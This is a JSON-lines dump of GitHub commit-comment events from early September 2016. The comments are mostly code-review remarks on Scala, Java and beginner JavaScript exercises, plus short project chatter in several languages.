{"id":"4506586259","type":"CommitCommentEvent","actor":{"login":"sellout"},"repo":{"name":"mossprescott/quasar"},"payload":{"comment":{"id":18875064,"position":71,"line":71,"path":"core/src/test/scala/quasar/std/StdLibSpec.scala","commit_id":"df848119c376d80a427b5a68237ae96980886147","created_at":"2016-09-02T04:57:20Z","updated_at":"2016-09-02T04:57:20Z","body":"I think all those things could be defined independent of what context they’re in. We have the same `Type` type in both places, so typing/untyping should still make sense, and simplification is a function `Func => Func`, so that should also be portable.\r\n\r\nI’d like to track {co}domain in the Scala types. It seems like we could at least get close to our current granularity and have things like.\r\n```scala\r\nfinal case class Add[A[_], I <: Quasar.Num](a1: A[I], a2: A[I]) extends MapFunc[A, I]\r\nfinal case class ProjectIndex[A[_]](src: A[Quasar.Array], idx: A[Quasar.Int])\r\n    extends MapFunc[A, Quasar.Top]\r\nfinal case class Coerce[A[_], I, J](value: A[I]) extends MapFunc[A, J]\r\n```\r\nThis is basically combining `matryoshka.mutu` (mutually-recursive) with covariance. `A` is still the recursive parameter, but now it’s a functor itself, with a type index. Also, we’d still need to do type inference for more precision, but this would 1. eliminate the need for separate {co}domain tracking, and 2. allow connector authors to have a lot fewer failure cases to worry about (right, @rabbitonweb?).\r\n\r\n`Coerce` is the loophole that lets a frontend combine operations where covariance isn’t enough (but `I` and `J` _should_ overlap). The type checker would later ensure that they do, as it does now."}},"created_at":"2016-09-02T04:57:20Z"}
{"id":"4506588319","type":"CommitCommentEvent","actor":{"login":"Restnpieces"},"repo":{"name":"Restnpieces/Ubuntu"},"payload":{"comment":{"id":18875068,"position":40,"line":38,"path":"README.md","commit_id":"9ec2f36bb9992b389f412bc8f6cc63c7c697a8c7","created_at":"2016-09-02T04:58:20Z","updated_at":"2016-09-02T04:58:20Z","body":"Stop at </add> no not add the text <add> or </add> just what is in between"}},"created_at":"2016-09-02T04:58:20Z"}
{"id":"4506595100","type":"CommitCommentEvent","actor":{"login":"OrcinoJohn"},"repo":{"name":"OrcinoJohn/hello-world"},"payload":{"comment":{"id":18875087,"position":null,"line":null,"path":null,"commit_id":"004cc82592177f5c8f2f58ec7cbc46653b4d4a2d","created_at":"2016-09-02T05:01:19Z","updated_at":"2016-09-02T05:01:19Z","body":"here"}},"created_at":"2016-09-02T05:01:19Z"}
{"id":"4506595894","type":"CommitCommentEvent","actor":{"login":"daniktheboss"},"repo":{"name":"TiberiumPY/puremine"},"payload":{"comment":{"id":18875093,"position":null,"line":null,"path":null,"commit_id":"78780457b019866ba6fc225fcfbcd3831bc2ddbb","created_at":"2016-09-02T05:01:41Z","updated_at":"2016-09-02T05:01:41Z","body":"Oh, well can you help for mcpe?"}},"created_at":"2016-09-02T05:01:41Z"}
{"id":"4506598910","type":"CommitCommentEvent","actor":{"login":"sbojchuk"},"repo":{"name":"IF-066-Java/bugTrckr"},"payload":{"comment":{"id":18875100,"position":9,"line":53,"path":"src/main/java/com/softserverinc/edu/services/IssueService.java","commit_id":"8f2412fcdb3726bf9561f7632d8d35d6feb0003d","created_at":"2016-09-02T05:03:07Z","updated_at":"2016-09-02T05:03:07Z","body":"please refactor in to one line:\r\n\r\n`return !(oldIssue.getStatus().equals(changedIssue.getStatus()))`"}},"created_at":"2016-09-02T05:03:07Z"}
{"id":"4506600728","type":"CommitCommentEvent","actor":{"login":"bebraw"},"repo":{"name":"webpack/webpack.io"},"payload":{"comment":{"id":18875105,"position":null,"line":null,"path":null,"commit_id":"27ac88298b2fc961e4bda388d71d7cca6c45a8e3","created_at":"2016-09-02T05:03:54Z","updated_at":"2016-09-02T05:03:54Z","body":"[markdownlint](https://github.com/DavidAnson/markdownlint) might work esp. if we can add a couple of custom rules to it."}},"created_at":"2016-09-02T05:03:54Z"}
{"id":"4506603535","type":"CommitCommentEvent","actor":{"login":"sbojchuk"},"repo":{"name":"IF-066-Java/bugTrckr"},"payload":{"comment":{"id":18875113,"position":1,"line":366,"path":"pom.xml","commit_id":"f18c6b356aa5e62fc992021e2bd5a01190ca9f08","created_at":"2016-09-02T05:05:10Z","updated_at":"2016-09-02T05:05:10Z","body":":+1: good commit with formatting whole code!"}},"created_at":"2016-09-02T05:05:10Z"}
{"id":"4506606488","type":"CommitCommentEvent","actor":{"login":"jueduiyheng"},"repo":{"name":"jueduiyheng/First"},"payload":{"comment":{"id":18875122,"position":3,"line":2,"path":"Firstdemo.txt","commit_id":"6b880eebb030c24559d7a5f602ec61b391039298","created_at":"2016-09-02T05:06:25Z","updated_at":"2016-09-02T05:06:25Z","body":"tygh"}},"created_at":"2016-09-02T05:06:25Z"}
{"id":"4506607545","type":"CommitCommentEvent","actor":{"login":"elizachen"},"repo":{"name":"elizachen/elizachen.github.io"},"payload":{"comment":{"id":18875124,"position":null,"line":null,"path":null,"commit_id":"5764094c3240971b485e1cca192c63fe68d3f7d0","created_at":"2016-09-02T05:06:53Z","updated_at":"2016-09-02T05:06:53Z","body":"Use the NextT themes,\r\nFix the bug: ##\"avatar:/images/avatar.png\" must be \"avatar:  /images/avatar.png\", need one blank. Please remeber to use  YAML Lint verify  _config.yml every time."}},"created_at":"2016-09-02T05:06:53Z"}
{"id":"4506608356","type":"CommitCommentEvent","actor":{"login":"rrbailey89"},"repo":{"name":"PokemonGoMap/PokemonGo-Map"},"payload":{"comment":{"id":18875127,"position":null,"line":null,"path":null,"commit_id":"5b575121a7a736d41d387d91e7f164cb327182eb","created_at":"2016-09-02T05:07:14Z","updated_at":"2016-09-02T05:07:14Z","body":"THANK YOU! 💯 👍 \r\n\r\nQuestion... is a potential intruder able to see the password via the page source or something similar? "}},"created_at":"2016-09-02T05:07:14Z"}
{"id":"4506609659","type":"CommitCommentEvent","actor":{"login":"ylavoie"},"repo":{"name":"pjlsergeant/test-bdd-cucumber-perl"},"payload":{"comment":{"id":18875130,"position":null,"line":null,"path":null,"commit_id":"061d26609a75b87462a84ec87c83b870bc388bb9","created_at":"2016-09-02T05:07:52Z","updated_at":"2016-09-02T05:07:52Z","body":"I also tried parallelism but I only saw sequential behaviour.\r\nI do confirm that tests run perfectly well and that extensions described in t/.pherkin.yaml are loaded as expected."}},"created_at":"2016-09-02T05:07:52Z"}
{"id":"4506610534","type":"CommitCommentEvent","actor":{"login":"sbojchuk"},"repo":{"name":"IF-066-Java/bugTrckr"},"payload":{"comment":{"id":18875132,"position":38,"line":40,"path":"src/main/java/com/softserverinc/edu/entities/WorkLog.java","commit_id":"a1e5fb4d3506fb920726f75f6880fac18fb137eb","created_at":"2016-09-02T05:08:16Z","updated_at":"2016-09-02T05:08:16Z","body":"please leave TODO with your initials"}},"created_at":"2016-09-02T05:08:16Z"}
{"id":"4506615857","type":"CommitCommentEvent","actor":{"login":"sbojchuk"},"repo":{"name":"IF-066-Java/bugTrckr"},"payload":{"comment":{"id":18875143,"position":1,"line":1,"path":"src/main/java/com/softserverinc/edu/controllers/IssueCommentController.java","commit_id":"3e6b08a0d780859b9a4287da8eb6095bb69438bb","created_at":"2016-09-02T05:10:30Z","updated_at":"2016-09-02T05:10:30Z","body":"wow!! you wanted to see sunrise? ;) so hard work!"}},"created_at":"2016-09-02T05:10:30Z"}
{"id":"4506616771","type":"CommitCommentEvent","actor":{"login":"TimothyVandenbrande"},"repo":{"name":"TimothyVandenbrande/chronicles"},"payload":{"comment":{"id":18875146,"position":null,"line":null,"path":null,"commit_id":"79d4269e856b9a1ed0b5e494080c6a1926119fb2","created_at":"2016-09-02T05:10:54Z","updated_at":"2016-09-02T05:10:54Z","body":"Ahh, seems you had the same issue I had. It tends to break quite fast once you mess a bit with the code.\r\nBut yes, doubt it would be worth it, if the performance decreases because of it. Because I have tried to make the book static, just one humongous html file where all the pages were already in there, but it wasn't easier to work with and made loading times go over the \"comfortable wait time\" when I was trying it locally, so I can only imagine what it will look like once it's published online.\r\n\r\nSo yes, you are right, it is not worth the squeeze.\r\nBut still, thank you for at least checking it too."}},"created_at":"2016-09-02T05:10:54Z"}
{"id":"4506619909","type":"CommitCommentEvent","actor":{"login":"sbojchuk"},"repo":{"name":"IF-066-Java/bugTrckr"},"payload":{"comment":{"id":18875151,"position":37,"line":37,"path":"src/main/java/com/softserverinc/edu/controllers/IssueCommentController.java","commit_id":"3e6b08a0d780859b9a4287da8eb6095bb69438bb","created_at":"2016-09-02T05:12:17Z","updated_at":"2016-09-02T05:12:17Z","body":"you can write above statement without 'else' condition\r\n\r\n```\r\nif (result.hasErrors()) {\r\n             return \"redirect:/issue/\" + issueId;\r\n         } \r\n             issueCommentService.save(newIssueComment);\r\n             LOGGER.info(\"Comment saved, id= \" + newIssueComment.getId());\r\n             return \"redirect:/issue/\" + issueId;\r\n         }\r\n```"}},"created_at":"2016-09-02T05:12:17Z"}
{"id":"4506621200","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":18875154,"position":null,"line":null,"path":null,"commit_id":"cd94c996877b798fe0b3b74b433c4bfecfabc076","created_at":"2016-09-02T05:12:51Z","updated_at":"2016-09-02T05:12:51Z","body":"[Your benchmark job](https://github.com/JuliaLang/julia/commit/cd94c996877b798fe0b3b74b433c4bfecfabc076#commitcomment-18874791) has completed - possible performance regressions were detected. A full report can be found [here](https://github.com/JuliaCI/BaseBenchmarkReports/blob/e62ceb6e5b8cbcba7b6e9a91e36ee4b44c48687d/daily_2016_9_2/report.md). cc @jrevels"}},"created_at":"2016-09-02T05:12:51Z"}
{"id":"4506621345","type":"CommitCommentEvent","actor":{"login":"sbojchuk"},"repo":{"name":"IF-066-Java/bugTrckr"},"payload":{"comment":{"id":18875155,"position":55,"line":55,"path":"src/main/java/com/softserverinc/edu/controllers/IssueCommentController.java","commit_id":"3e6b08a0d780859b9a4287da8eb6095bb69438bb","created_at":"2016-09-02T05:12:55Z","updated_at":"2016-09-02T05:12:55Z","body":"please do not leave commented code on demo"}},"created_at":"2016-09-02T05:12:55Z"}
{"id":"4506624232","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"jaels/school"},"payload":{"comment":{"id":18875159,"position":3,"line":3,"path":"wk1/day4js/exercise1.js","commit_id":"c85bbb4d34d85b592bef1de921dc71849f0a059e","created_at":"2016-09-02T05:14:12Z","updated_at":"2016-09-02T05:14:12Z","body":"One small issue here is that if I pass an object that doesn't have `Object.prototype` as the first object in its prototype chain, its properties will not be enumerated."}},"created_at":"2016-09-02T05:14:12Z"}
{"id":"4506625839","type":"CommitCommentEvent","actor":{"login":"zetekla"},"repo":{"name":"zetekla/mean-made-simple"},"payload":{"comment":{"id":18875161,"position":null,"line":null,"path":null,"commit_id":"049db79772d113ea8aea111e22252d8893084550","created_at":"2016-09-02T05:14:55Z","updated_at":"2016-09-02T05:14:55Z","body":"https://www.nathanhleung.com/article/2015/12/26/getting-started-with-the-mean-stack/"}},"created_at":"2016-09-02T05:14:55Z"}
{"id":"4506630250","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"juliendubrail/julien_spices"},"payload":{"comment":{"id":18875172,"position":4,"line":4,"path":"wk1/d4ex1.js","commit_id":"50cbd7c39f07815cbd3ac94da4813515aa60bec1","created_at":"2016-09-02T05:16:52Z","updated_at":"2016-09-02T05:16:52Z","body":"This should be a `for` loop (and not a `for...in` loop) to ensure that we only see the numbered items in the array and not other properties."}},"created_at":"2016-09-02T05:16:52Z"}
{"id":"4506630485","type":"CommitCommentEvent","actor":{"login":"gcampax"},"repo":{"name":"Stanford-Mobisocial-IoT-Lab/sempre"},"payload":{"comment":{"id":18875173,"position":null,"line":null,"path":null,"commit_id":"bd7e3b8879e587d7d83ec75e997fa61691d1c05f","created_at":"2016-09-02T05:16:56Z","updated_at":"2016-09-02T05:16:56Z","body":"Yes this is very much needed. As the commit message says, the noise is useful towards the beginning of the learning processes and speeds it up (ie, it increases the oracle accuracy, which is the percentage of the examples that lead to actual learning), but as the learning goes on it just lowers the accuracy for no benefit. And of course it should always be zero for the last iteration (which is a self-check with the learned parameters), otherwise the numbers you get at the end are bogus."}},"created_at":"2016-09-02T05:16:56Z"}
{"id":"4506632195","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"JuliaQuant/MarketData.jl"},"payload":{"comment":{"id":18875175,"position":null,"line":null,"path":null,"commit_id":"2b36390820e77938c28b1a7fb4fd11825367e67c","created_at":"2016-09-02T05:17:38Z","updated_at":"2016-09-02T05:17:38Z","body":"yeah sorry I made it more picky recently in the process of freezing metadata for 0.3"}},"created_at":"2016-09-02T05:17:38Z"}
{"id":"4506637425","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"fredpinon/Fred"},"payload":{"comment":{"id":18875182,"position":2,"line":2,"path":"wk1/js_day4/ex1.js","commit_id":"34dd55aeff09fa4472952200a50add675cb24be7","created_at":"2016-09-02T05:20:09Z","updated_at":"2016-09-02T05:20:09Z","body":"There's no need for parens around the second condition, it can just be `!Array.isArray(objar)`. "}},"created_at":"2016-09-02T05:20:09Z"}
{"id":"4506639674","type":"CommitCommentEvent","actor":{"login":"NUmeroAndDev"},"repo":{"name":"NUmeroAndDev/MemoServer-rails"},"payload":{"comment":{"id":18875190,"position":null,"line":null,"path":null,"commit_id":"a858c4b0b3342e821fa64ea38454f62b6f6ddba9","created_at":"2016-09-02T05:21:04Z","updated_at":"2016-09-02T05:21:04Z","body":"add rails version"}},"created_at":"2016-09-02T05:21:04Z"}
{"id":"4506642341","type":"CommitCommentEvent","actor":{"login":"dellheng"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":18875194,"position":11,"line":28,"path":"local-cli/bundle/buildBundle.js","commit_id":"86cbaedb7a40a5afb105caadffdf1cea27624e31","created_at":"2016-09-02T05:22:19Z","updated_at":"2016-09-02T05:22:19Z","body":"why romove this condition"}},"created_at":"2016-09-02T05:22:19Z"}
{"id":"4506644632","type":"CommitCommentEvent","actor":{"login":"budnyjj"},"repo":{"name":"Workgood/courses_python"},"payload":{"comment":{"id":18875198,"position":null,"line":null,"path":null,"commit_id":"566f5764ef01e342c5911cb34145d20ef50e60e9","created_at":"2016-09-02T05:23:24Z","updated_at":"2016-09-02T05:23:24Z","body":"Пріведі, пожалуйста, минимальный конкретный пример.\r\n\r\n1 сентября 2016 г., 22:53 пользователь Workgood <notifications@github.com>\r\nнаписал:\r\n\r\n> Пользователь вводит название текстового документа(или путь к файлу) и\r\n> максимальную длину строки, ожидается что программа вернет текст, разбитый\r\n> на строки длинной не больше чем заданная(не разрывая слова)\r\n>\r\n> —\r\n> You are receiving this because you commented.\r\n> Reply to this email directly, view it on GitHub\r\n> <https://github.com/Workgood/courses_python/commit/566f5764ef01e342c5911cb34145d20ef50e60e9#commitcomment-18869643>,\r\n> or mute the thread\r\n> <https://github.com/notifications/unsubscribe-auth/ABRR4lA0v3Xho9_JSgwwvaexTZTzUfTlks5qly00gaJpZM4JxW5Z>\r\n> .\r\n>\r\n"}},"created_at":"2016-09-02T05:23:24Z"}
{"id":"4506647624","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"KarenNemeth/Spiced-Academy"},"payload":{"comment":{"id":18875205,"position":3,"line":3,"path":"wk1/Objects-and-Arrays.js","commit_id":"3d9c0790697cddf8e18d1310aea17b69465b06ec","created_at":"2016-09-02T05:24:43Z","updated_at":"2016-09-02T05:24:43Z","body":"This will generally work as desired except if an array that has custom enumerable properties added to it is passed in we would see those too. For this reason we should use `for` (or `Array.prototype.forEach`) instead of `for...in` if the first argument to `each` is an array."}},"created_at":"2016-09-02T05:24:43Z"}
{"id":"4506647854","type":"CommitCommentEvent","actor":{"login":"rpappa"},"repo":{"name":"CraftSpider/Stronghold2016-340"},"payload":{"comment":{"id":18875206,"position":null,"line":null,"path":null,"commit_id":"06174e3cc46419c8646eff693dcfee03f7db5f65","created_at":"2016-09-02T05:24:49Z","updated_at":"2016-09-02T05:24:49Z","body":"Note that I will preface this by saying it is like 1:15 AM and a little too late to be dealing with this.\r\n\r\nNot only were the changes I committed tested (not sure if yours were), but if you reference [the code here](https://github.com/CraftSpider/Stronghold2016-340/blob/2bc0b4285edd8ff29ec8b1094e9fd928be445f78/Stronghold2016/src/org/usfirst/frc/team340/robot/OI.java) notably lines 316-339, you will see that the following directions were given:\r\n\r\n- DPadUp2 ... get() ... return xBoxCoDriver.getPOV() == 0;\r\n\r\n- DPadRight2 ... get() ... return xBoxCoDriver.getPOV() == 90;\r\n\r\n- DPadDown2 ... get() ... return xBoxCoDriver.getPOV() == 180;\r\n\r\nWhich was in the production code for quite some time and had been tested and proved through the usage of the robot, and which lines up with the directions I committed. While I do like this implementation for the DPad, and I believe that the directions you initially supplied line up with one would expect based off geometry, I am fairly certain that the numbers I changed it to line up with what is actually returned when an operator interacts with the controller, at the very least for up and down which were required to be operational in the testing wednesday evening.\r\n\r\nBut again, it is late and I could be completely wrong. This is a good lesson as to why we should thoroughly test our code."}},"created_at":"2016-09-02T05:24:49Z"}
{"id":"4506652894","type":"CommitCommentEvent","actor":{"login":"dmaddenco"},"repo":{"name":"dmaddenco/PA1"},"payload":{"comment":{"id":18875214,"position":null,"line":null,"path":null,"commit_id":"a54fce784c436b3744f852bfdc5ff8e5c4754c0c","created_at":"2016-09-02T05:27:00Z","updated_at":"2016-09-02T05:27:00Z","body":"Need to return false when file only contains whitespace and no integers..."}},"created_at":"2016-09-02T05:27:00Z"}
{"id":"4506653127","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"Angizd/A.zobarandiez"},"payload":{"comment":{"id":18875215,"position":26,"line":26,"path":"wk1/01:09:16.js","commit_id":"24e410f126552bd74af59cf3a39ea666c3c4708b","created_at":"2016-09-02T05:27:06Z","updated_at":"2016-09-02T05:27:06Z","body":"We should use a `for` loop (or `Array.prototype.forEach`) instead of a `for...in` loop if the item is an array. This will ensure that any custom enumerable properties that have been added do not show up and we only see the items in the array's numbered slots."}},"created_at":"2016-09-02T05:27:06Z"}
{"id":"4506654367","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"Angizd/A.zobarandiez"},"payload":{"comment":{"id":18875216,"position":41,"line":41,"path":"wk1/01:09:16.js","commit_id":"24e410f126552bd74af59cf3a39ea666c3c4708b","created_at":"2016-09-02T05:27:39Z","updated_at":"2016-09-02T05:27:39Z","body":"This is not a constructor so it is unexpected that it start with a capital letter."}},"created_at":"2016-09-02T05:27:39Z"}
{"id":"4506657385","type":"CommitCommentEvent","actor":{"login":"kennytm"},"repo":{"name":"Manishearth/rust-clippy"},"payload":{"comment":{"id":18875222,"position":5,"line":5,"path":"CHANGELOG.md","commit_id":"8d231b22a10687c336117bab26f2864ed80153d6","created_at":"2016-09-02T05:28:58Z","updated_at":"2016-09-02T05:28:58Z","body":"@mcarton LGTM"}},"created_at":"2016-09-02T05:28:58Z"}
{"id":"4506657664","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"Angizd/A.zobarandiez"},"payload":{"comment":{"id":18875225,"position":64,"line":64,"path":"wk1/01:09:16.js","commit_id":"24e410f126552bd74af59cf3a39ea666c3c4708b","created_at":"2016-09-02T05:29:06Z","updated_at":"2016-09-02T05:29:06Z","body":"This causes the array that is passed in to be reversed. We want to leave the array that is passed in alone and return a new array containing the items from the first array in reverse order."}},"created_at":"2016-09-02T05:29:06Z"}
{"id":"4506662072","type":"CommitCommentEvent","actor":{"login":"rakovicstimea"},"repo":{"name":"rakovicstimea/kavehaz"},"payload":{"comment":{"id":18875243,"position":1,"line":1,"path":"LICENSE","commit_id":"88658cc20122f44b42dca5f7f0e97b7684dc5155","created_at":"2016-09-02T05:30:52Z","updated_at":"2016-09-02T05:30:52Z","body":"lorem ipsum"}},"created_at":"2016-09-02T05:30:52Z"}
{"id":"4506662835","type":"CommitCommentEvent","actor":{"login":"yossigil"},"repo":{"name":"SpartanRefactoring/spartan-refactoring"},"payload":{"comment":{"id":18875244,"position":null,"line":null,"path":null,"commit_id":"a5a53c9244d8ba0d6ac1673bfa8ae5915b71d565","created_at":"2016-09-02T05:31:14Z","updated_at":"2016-09-02T05:31:14Z","body":"@dngreenst : good job"}},"created_at":"2016-09-02T05:31:14Z"}
{"id":"4506664367","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"bigmickeystyle/wk1"},"payload":{"comment":{"id":18875247,"position":3,"line":3,"path":"thursday1.js","commit_id":"51e08a4d6471a4f1373eda9a60375a6649b6a0f0","created_at":"2016-09-02T05:31:54Z","updated_at":"2016-09-02T05:31:54Z","body":"If an array is passed in it will slip through this test because `typeof []` returns `object`. If you swapped the `if` and the `else` we would be in good shape."}},"created_at":"2016-09-02T05:31:54Z"}
{"id":"4506667446","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"bigmickeystyle/wk1"},"payload":{"comment":{"id":18875251,"position":3,"line":3,"path":"thursday1.js","commit_id":"51e08a4d6471a4f1373eda9a60375a6649b6a0f0","created_at":"2016-09-02T05:33:15Z","updated_at":"2016-09-02T05:33:15Z","body":"I like that you're verifying that we received a function as the second argument"}},"created_at":"2016-09-02T05:33:15Z"}
{"id":"4506668031","type":"CommitCommentEvent","actor":{"login":"hnkb"},"repo":{"name":"hnkb/crib"},"payload":{"comment":{"id":18875252,"position":null,"line":null,"path":null,"commit_id":"b1f608520f6223e994bf4ee90ac225277b6b6921","created_at":"2016-09-02T05:33:30Z","updated_at":"2016-09-02T05:33:30Z","body":"The old approach suppressed ALT+F4 and prevented it from closing the window, as well as logging a lot of non-usable events (like IME or `WM_CHAR` messages)."}},"created_at":"2016-09-02T05:33:30Z"}
{"id":"4506668195","type":"CommitCommentEvent","actor":{"login":"rubenv"},"repo":{"name":"rubenv/sql-migrate"},"payload":{"comment":{"id":18875253,"position":null,"line":null,"path":null,"commit_id":"6f4757563362064790a6687a6b60f182062c8634","created_at":"2016-09-02T05:33:33Z","updated_at":"2016-09-02T05:33:33Z","body":"@joshdekock It failed and I didn't have time to look into it at that time: https://travis-ci.org/rubenv/sql-migrate/jobs/138841880"}},"created_at":"2016-09-02T05:33:33Z"}
{"id":"4506668878","type":"CommitCommentEvent","actor":{"login":"mlspinylobster"},"repo":{"name":"onnfetuya/sanmoku"},"payload":{"comment":{"id":18875254,"position":null,"line":null,"path":null,"commit_id":"bbdae918f79086c2608b737277d2d4c810f58a1a","created_at":"2016-09-02T05:33:53Z","updated_at":"2016-09-02T05:33:53Z","body":"`sanmoku.rb` はもう不要ですか？使わなくなったコードがあれば消しておきましょう"}},"created_at":"2016-09-02T05:33:53Z"}
{"id":"4506669245","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"thiloo/code"},"payload":{"comment":{"id":18875256,"position":20,"line":20,"path":"wk1/day4ex1.js","commit_id":"20ff33367b1cc30d5584855a93e23429441f10b2","created_at":"2016-09-02T05:34:02Z","updated_at":"2016-09-02T05:34:02Z","body":"I like that you're verifying that we have received a function as the second arg"}},"created_at":"2016-09-02T05:34:02Z"}
{"id":"4506671300","type":"CommitCommentEvent","actor":{"login":"roderickhsiao"},"repo":{"name":"airbnb/enzyme"},"payload":{"comment":{"id":18875260,"position":null,"line":null,"path":null,"commit_id":"1d0fc67459955564d0455b56a9cc228aca01df2d","created_at":"2016-09-02T05:34:48Z","updated_at":"2016-09-02T05:34:48Z","body":"@ljharb nvm, we should be good to get a new version by fresh install.\r\n\r\nthanks!"}},"created_at":"2016-09-02T05:34:48Z"}
{"id":"4506671913","type":"CommitCommentEvent","actor":{"login":"diluga"},"repo":{"name":"s3tools/s3cmd"},"payload":{"comment":{"id":18875263,"position":null,"line":null,"path":null,"commit_id":"8533cd191b426d13448a01f5c4d5b6f0dcb68d51","created_at":"2016-09-02T05:35:07Z","updated_at":"2016-09-02T05:35:07Z","body":"thx!I have test this patch,it worked!"}},"created_at":"2016-09-02T05:35:07Z"}
{"id":"4506676691","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"AlejandroMagual/spicedacademy"},"payload":{"comment":{"id":18875272,"position":4,"line":4,"path":"wk1/day4/Excercise1.js","commit_id":"6d68358a3048eeed5ef5434814d805677e478d0c","created_at":"2016-09-02T05:37:11Z","updated_at":"2016-09-02T05:37:11Z","body":"This will usually work but if someone passes in an array to which custom enumerable properties have been added we would see those in addition to the items in the numbered slots of the array. For this reason it is better to use a `for` loop (or `Array.prototype.forEach`) rather than a `for...in` loop if we are dealing with an array."}},"created_at":"2016-09-02T05:37:11Z"}
{"id":"4506679214","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"rtyx/Exercises"},"payload":{"comment":{"id":18875277,"position":6,"line":6,"path":"wk1/day4/wk1day4exer1.js","commit_id":"1bf66251a484918c211742f8243c4354abf7b280","created_at":"2016-09-02T05:38:16Z","updated_at":"2016-09-02T05:38:16Z","body":"I like that you're validating both inputs"}},"created_at":"2016-09-02T05:38:16Z"}
{"id":"4506681388","type":"CommitCommentEvent","actor":{"login":"Jody7"},"repo":{"name":"commitEric/tacoMiner"},"payload":{"comment":{"id":18875282,"position":null,"line":null,"path":null,"commit_id":"4ed7a0cd20a7430dacf5e0bcc36d8fd6e769d95e","created_at":"2016-09-02T05:39:14Z","updated_at":"2016-09-02T05:39:14Z","body":"code hotspots for optimization\r\n\r\n![](http://image.prntscr.com/image/4c022d7188fa456e93b5f7ab8d3c2698.png)\r\n\r\n![](http://image.prntscr.com/image/27cad4aa3cc041ab861a2adb89677416.png)\r\n\r\nmaybe work on the header byte concat, and we need to make a faster sha256 algo somehow...\r\n\r\nor we can just go straight into GPU coding mode\r\n"}},"created_at":"2016-09-02T05:39:14Z"}
{"id":"4506682380","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"rtyx/Exercises"},"payload":{"comment":{"id":18875286,"position":9,"line":9,"path":"wk1/day4/wk1day4exer1.js","commit_id":"1bf66251a484918c211742f8243c4354abf7b280","created_at":"2016-09-02T05:39:38Z","updated_at":"2016-09-02T05:39:38Z","body":"This will work under most circumstances. However, if an array that has custom enumerable properties added to it is passed in we would see those and not just the items in the numbered slots of the array. For this reason it is better to use a `for` loop (or the `forEach` method) if we are dealing with an array."}},"created_at":"2016-09-02T05:39:38Z"}
{"id":"4506682852","type":"CommitCommentEvent","actor":{"login":"SquirrelWorkpace"},"repo":{"name":"SquirrelWorkpace/SquirrelWorkpace.github.io"},"payload":{"comment":{"id":18875288,"position":null,"line":null,"path":null,"commit_id":"3fbde5ace675cb7114a08beda384f9f8bddced54","created_at":"2016-09-02T05:39:50Z","updated_at":"2016-09-02T05:39:50Z","body":"Add the header and footer picture to the blog !"}},"created_at":"2016-09-02T05:39:50Z"}
{"id":"4506682858","type":"CommitCommentEvent","actor":{"login":"clime"},"repo":{"name":"fedora-copr/copr"},"payload":{"comment":{"id":18875289,"position":null,"line":null,"path":null,"commit_id":"7ac4eefccb2c55820803ac46a6943ebbff50fb9b","created_at":"2016-09-02T05:39:51Z","updated_at":"2016-09-02T05:39:51Z","body":"Yes, I can do it before next release. Please, forgive me this mistake..."}},"created_at":"2016-09-02T05:39:51Z"}
{"id":"4506684347","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"rtyx/Exercises"},"payload":{"comment":{"id":18875292,"position":4,"line":4,"path":"wk1/day4/wk1day4exer3.js","commit_id":"1bf66251a484918c211742f8243c4354abf7b280","created_at":"2016-09-02T05:40:28Z","updated_at":"2016-09-02T05:40:28Z","body":"I'd put the `})` on a new line"}},"created_at":"2016-09-02T05:40:28Z"}
{"id":"4506687150","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"rtyx/Exercises"},"payload":{"comment":{"id":18875297,"position":2,"line":2,"path":"wk1/day4/wk1day4exer3.js","commit_id":"1bf66251a484918c211742f8243c4354abf7b280","created_at":"2016-09-02T05:41:32Z","updated_at":"2016-09-02T05:41:32Z","body":"You can just do \r\n\r\n```js\r\nif (Array.isArray(salad)) {\r\n```\r\n\r\nto cut down on typing and clutter"}},"created_at":"2016-09-02T05:41:32Z"}
{"id":"4506690772","type":"CommitCommentEvent","actor":{"login":"DaniilZhavner"},"repo":{"name":"PurrWeb/upwork-user-agreement"},"payload":{"comment":{"id":18875306,"position":null,"line":null,"path":null,"commit_id":"c3e9a1fdc6c1ac722ec8a5181657e6b14c26ae84","created_at":"2016-09-02T05:43:06Z","updated_at":"2016-09-02T05:43:06Z","body":"done\r\n"}},"created_at":"2016-09-02T05:43:06Z"}
{"id":"4506692830","type":"CommitCommentEvent","actor":{"login":"kimtx200"},"repo":{"name":"kimtx200/FirstGitTest"},"payload":{"comment":{"id":18875308,"position":2,"line":2,"path":"README.md","commit_id":"d3d8d39fb0e2ca01ea90b58bfd31c7a8b20cb912","created_at":"2016-09-02T05:43:57Z","updated_at":"2016-09-02T05:43:57Z","body":"잘못썼다"}},"created_at":"2016-09-02T05:43:57Z"}
{"id":"4506693468","type":"CommitCommentEvent","actor":{"login":"elizachen"},"repo":{"name":"elizachen/elizachen.github.io"},"payload":{"comment":{"id":18875311,"position":null,"line":null,"path":null,"commit_id":"930545e3b2718f58ee0ca2ae4a5bf1ce94153ca2","created_at":"2016-09-02T05:44:12Z","updated_at":"2016-09-02T05:44:12Z","body":"Add the leancloud visit counter."}},"created_at":"2016-09-02T05:44:12Z"}
